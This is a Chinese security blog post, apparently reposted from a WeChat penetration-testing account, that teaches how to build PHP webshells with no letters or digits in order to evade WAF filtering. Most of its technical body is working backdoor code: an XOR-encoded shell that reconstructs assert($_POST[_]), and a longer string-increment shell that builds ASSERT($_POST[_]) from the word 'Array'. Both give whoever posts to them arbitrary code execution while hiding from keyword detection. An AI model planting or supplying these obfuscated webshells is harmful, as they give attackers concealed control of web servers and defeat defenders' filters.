通过非数字和字符的方式实现PHP WebShell

admin 2021年7月25日06:19:44评论172 views字数 2665阅读8分53秒阅读模式
点击上方蓝字可以订阅哦

通过非数字和字符的方式实现PHP WebShell

话不多说,我们直奔主题!

一般来说,我们所写的webshell通常都会包含数字或字母。比如说下面这样:

<?phpif(!preg_match('/[a-z0-9]/is',$_GET['shell'])){eval($_GET['shell']);  }


但如果你想要绕过WAF的话,你还得使用一些其他的技术来重写你的webshell。

思路

首先我们要明确思路,我的核心思想就是通过一系列字符变换最终利用非字母和非数字字符构建出webshell,然后使用PHP的动态函数(例如“assert”)来完成函数名的拼接,最后动态执行构建出来的代码。

所以,转换方法就是解决这一问题的重点了。但是在开始之前,我需要跟大家讨论以下php5和php7之间的区别。

php5的断言(assert)是通过函数实现的,我们可以使用$f=’assert’;$f(…);这种方法来动态执行任意代码。但是在php7中,断言已经不再是一个函数了,而是一种语言结构(类似eval),而且断言(assert)也无法再作为函数名来实现代码的动态执行了,所以对于php7来说,问题可能会变得更加复杂了。不过各位也不用太过担心,因为我们可以使用 file_put_contents函数来达到我们的目的。

为了方便起见,本文的实验环境使用的是php5,关于php7的利用方式就请各位自行去探索啦:D

方法一

这是一种最简单的方法了。在php中,我们可以通过异或运算(XOR)来得到一个或两个字符串。因此,如果我们想要得到一个a-z之间的英文字符,我们就可以通过两个非字母字符和字符数来生成所需要的字母字符。示例代码如下:


<?php$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); //$_='assert';  $__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']');// $__='_POST';  $___=$$__;  $_($___[_]); // assert($_POST[_]);

解析结果如下:

通过非数字和字符的方式实现PHP WebShell

方法二

在这种方法中,我们可以使用一些特殊的小技巧来实现我们的目标。首先,请大家参考php.net的这份文档:【传送门】

文档中写到:“在处理字符变量的算术运算时,PHP遵循的是Perl的规范,而并非C语言规范。比如说在PHP和Perl中,$a = ‘Z’; $a++;经过计算之后变量$a会变成 ‘AA’,但是在C语言中,a = ‘Z’; a++;计算后会将a变为‘[’(‘Z’的ASCII值为90,‘[’的ASCII值为91)。请注意,字符变量可以进行自增运算但无法进行自减运算,而且只有ASCII字母和数字(a-z,A-Z,0-9)才支持这种运算,如果对其他字符变量进行这种运算将不会有任何作用,此时的原始字符串将保持不变。”

那么接下来,我们应该如何才能得到一个包含字符‘a’的变量呢?

字符串“Array”的首字母是一个大写的‘A’,而第四个字母则是一个小写的‘a’。换句话说,我们可以通过这个字符串同时得到大写和小写的字母‘a’(A),这也就意味着我们可以通过这种方法得到a-z和A-Z中任意一个字母字符。

比如说在PHP中,如果你想拼接数组和字符串,那么你首先要将字符串(array)转换成一个字符串(这个字符串的值为Array):

通过非数字和字符的方式实现PHP WebShell

然后截取字符串的首字母,我们就得到了‘A’。

利用这项技术,我编写了如下所示的webshell(由于PHP函数是对大小写敏感的,所以我在结尾补上了ASSERT($_POST[_])):


<?php  $_=[];  $_=@"$_"; // $_='Array';  $_=$_['!'=='@']; // $_=$_[0];  $___=$_; // A  $__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;  $___.=$__; // S  $___.=$__; // S  $__=$_;  $__++;$__++;$__++;$__++; // E  $___.=$__;  $__=$_;  $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;// R  $___.=$__;  $__=$_;  $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;// T  $___.=$__;  $____='_';  $__=$_;  $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;// P  $____.=$__;  $__=$_;  $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;// O  $____.=$__;  $__=$_;  $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;// S  $____.=$__;  $__=$_;  $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;// T   $____.=$__;  $_=$$____;  $___($_[_]); // ASSERT($_POST[_]);


解析结果如下图所示:

通过非数字和字符的方式实现PHP WebShell

总结

很多网站现在都会对特殊字符进行过滤和检测,因此希望这项技术可以给各位Web渗透测试人员提供一些解决问题的思路。 

通过非数字和字符的方式实现PHP WebShell


本文始发于微信公众号(零组攻防实验室):通过非数字和字符的方式实现PHP WebShell

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年7月25日06:19:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   通过非数字和字符的方式实现PHP WebShellhttps://cn-sec.com/archives/356556.html

发表评论

匿名网友 填写信息